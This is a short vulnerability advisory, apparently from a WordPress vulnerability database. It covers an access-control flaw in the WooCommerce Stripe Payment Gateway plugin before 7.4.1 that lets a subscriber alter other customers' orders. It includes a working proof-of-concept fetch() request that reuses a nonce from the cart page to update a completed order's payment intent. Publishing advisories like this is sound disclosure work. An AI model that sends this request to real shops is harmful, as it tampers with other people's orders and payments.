WooCommerce Stripe Payment Gateway < 7.4.1 - Subscriber+ Order Intent Update

2023-06-2600:00:00

wpvulndb

woocommerce

stripe payment gateway

ajax functions

subscriber

security exploit

EPSS

Percentile

9.0%

JSON

The plugin does not properly restrict users from making a certain set of changes to other customers’ orders. TODO: ADD link to Patchstack’s post instead of H1

Affected functions:
create_payment_intent_ajax
update_payment_intent_ajax
save_upe_appearance_ajax
update_order_status_ajax
update_failed_order_ajax

As a subscriber, go to the cart page (ie https://example/cart/) and grab the updateFailedOrderNonce nonce, then perform the below request (42 being a Completed Order ID)

fetch("/cart/?wc-ajax=wc_stripe_update_failed_order", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'order_id=42&_wpnonce=NONCE&intent_id=1',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

References

hackerone.com/reports/1949357

patchstack.com/database/vulnerability/woocommerce-gateway-stripe/wordpress-woocommerce-stripe-payment-gateway-plugin-7-4-0-unauthenticated-broken-access-control-vulnerability

EPSS

Percentile

9.0%

JSON

Related for WPEX-ID:BDE23A65-476D-411B-A0D3-F2B9D7112C01